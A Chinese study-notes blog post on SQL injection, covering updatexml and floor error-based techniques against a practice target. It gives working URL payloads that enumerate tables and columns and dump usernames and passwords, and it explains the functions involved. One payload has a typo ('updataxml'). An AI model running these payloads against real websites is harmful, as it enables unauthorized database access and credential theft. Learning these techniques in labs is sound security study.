sql知识总结二(接上)

2.updatexml报错注入

(1)判断字符型/数字型

如果是字符型再判断闭合方式(备注:结尾加--+看是否闭合,若页面正常执行则闭合完成)

?id=1") and 1=updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) --+

concat() 合并字符

优先执行彩色部分命令

?id=1" and 1=updatexml(1,concat('~',(select database())),3)--+

?id=1") and 1=updataxml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),3)

?id=1") and 1=updatexml(1,concat(0x7e,(select group_concat(username,password) from users)),3) --+

?id=1")and 1=updatexml(1,concat(0x7e,(select substring(group_concat(username,':',password),1,30) from users)),3)--+

显示1~30字符

?id=1")and 1=updatexml(1,concat(0x7e,(select substring(group_concat(username,':',password),30,30) from users)),3)--+

#显示30~50字符,第30 个字符为

(2)靶机用户名密码存放位置的表名和列名

数据库information_schema中的数据表tables下数据列table_name和数据表columns下数据列column_name

(3)函数

database()数据库库名

group_concat() 把查询到的结果合并到一行显示

concat() 合并字符

substring(),00,30 从00个字符开始显示30个字符

3.floor报错注入

(1)涉及到的函数

rand()函数,随机返回0~1间的小数

floor()函数,小数向下取整数。 向上取整数ceiling()

concat_ws()函数,将括号内数据用第一个字段连接起来

group by 分组

as 别名

count(),汇总统计数量

limit,这里用于显示指定行数

rand()函数

>select rand();计算结果在0~1之间

>select rand()*2; 计算结果在0~2之间

>select rand() from users; 根据users的行数随机显示结果

floor()函数

>select floor(rand()*2); 结果随机为0或1

concat_ws函数,将括号内数据用第一个字段连接起来

>select concat_ws('-',(select database()),floor(rand()*2);

相关推荐
静听山水8 分钟前
SQLite
数据库·sqlite
草明1 小时前
clickhouse 检查是否有删除语句在执行
数据库·clickhouse
风语者日志1 小时前
攻防世界—easyupload
数据库·web安全·ctf·小白入门
彡皮1 小时前
qt实用学习案例:数据库设计+图表显示+model-view模式+样式表定制
数据库·qt·学习
码出钞能力2 小时前
如何屏蔽GORM个别sql的日志
数据库·sql·gorm
TDengine (老段)2 小时前
TDengine 数字函数 RADIANS 用户手册
大数据·数据库·sql·物联网·时序数据库·tdengine·涛思数据
小蒜学长2 小时前
springboot基于JAVA的二手书籍交易系统的设计与实现(代码+数据库+LW)
java·数据库·spring boot·后端
野犬寒鸦2 小时前
从零起步学习MySQL || 第七章:初识索引底层运用及性能优化(结合底层数据结构讲解)
java·数据库·后端·mysql·oracle
6极地诈唬3 小时前
【sqlite】WAL初探
数据库·sqlite
PieroPc3 小时前
用Python Streamlit sqlite3 写一个简单博客
数据库·python·sqlite